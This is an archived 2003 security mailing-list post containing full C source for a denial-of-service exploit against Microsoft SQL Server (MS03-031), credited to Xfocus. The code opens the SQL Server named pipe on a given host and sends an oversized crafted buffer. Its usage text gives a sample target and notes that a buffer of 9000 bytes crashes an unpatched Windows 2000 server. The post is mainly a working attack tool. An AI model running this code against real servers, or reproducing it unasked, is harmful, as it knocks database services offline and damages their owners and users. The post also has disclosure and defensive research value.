exp for Microsoft SQL Server DoS(MS03-031) By Xfocus

From: benjurry (benjurryat_private)
Date: Fri Jul 25 2003 - 08:25:13 PDT

Next message: Mandrake Linux Security Team: "MDKSA-2003:066-2 - Updated kernel packages fix multiple vulnerabilities"

Previous message: SGI Security Coordinator: "[Full-Disclosure] Emulex FibreChannel Hub Vulnerable to SNMP DoS Attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

////////////////////////////////////////////////////////////////////////////////
//      
//      exp for Microsoft SQL Server DoS(MS03-031)
//
//      By		  : refdom
//		Email	  : refdomat_private
//		Home Page : http://www.xfocus.org

//   http://www.xfocus.org/exploits/200307/expMS0331.cpp

////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>


void Usage()
{
	printf("******************************************\n");
	printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n");
	printf("\t Written by Refdom\n");
	printf("\t Email: refdomat_private\n");
	printf("\t Homepage: www.xfocus.org\n\n");
	printf("Usage: DOSMSSQL.exe server buffersize\n");
	printf("eg: DOSMSSQL.exe192.168.0.1 9000\n\n");
	printf("The buffersize depends on service pack level.\n");
	printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
	printf("when buffersize is 9000, the server can be crashed.\n");
	printf("\n");
	printf("*******************************************\n\n");
}


int main(int argc, char* argv[])
{
	char lpPipeName[50];
	char *lpBuffer = NULL;
	unsigned long ulSize = 0;

	BOOL bResult;
	DWORD dwWritten = 0, dwMode;
	HANDLE hPipe;

	Usage();

	printf("Starting...\n");

	if (argc != 3)
		goto Exit0;
	
	if (strlen(argv[1]) < 20)
	{
		sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
	}
	else
	{
		printf("Error!server\n");
		goto Exit0;
	}

	ulSize= atol(argv[2]);

	lpBuffer = (char*)malloc(ulSize + 2);
	if (NULL == lpBuffer)
	{
		printf("malloc error!\n");
		goto Exit0;
	}

	memset(lpBuffer, 0, ulSize + 2);
	memset(lpBuffer, 'A', ulSize);
	*lpBuffer = '\x12';
	*(lpBuffer + 1) = '\x01';
	*(lpBuffer + 2) = '\x00';
	
	printf("Connecting Server...\n");

	hPipe = CreateFile(lpPipeName, 
					GENERIC_READ | GENERIC_WRITE,
					0,
					NULL,
					OPEN_EXISTING,
					0,
					NULL);
	if (INVALID_HANDLE_VALUE == hPipe)
	{
		printf("Error!Connect server!%d\n", GetLastError());
		goto Exit0;
	}

   dwMode = PIPE_READMODE_MESSAGE; 
   bResult = SetNamedPipeHandleState( 
      hPipe,    // pipe handle 
      &dwMode,  // new pipe mode 
      NULL,     // don't set maximum bytes 
      NULL);    // don't set maximum time 
   if (!bResult)
   {
		printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
		goto Exit0;
   }

	bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);

	if (!bResult)
	{
		printf("\n\tError!WriteFile.%d\n\n", GetLastError());
		printf("When see the error message, the target may be crashed!!\n\n");
		goto Exit0;
	}

Exit0:
	
	return 0;
}

Next message: Mandrake Linux Security Team: "MDKSA-2003:066-2 - Updated kernel packages fix multiple vulnerabilities"
Previous message: SGI Security Coordinator: "[Full-Disclosure] Emulex FibreChannel Hub Vulnerable to SNMP DoS Attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jul 25 2003 - 09:57:24 PDT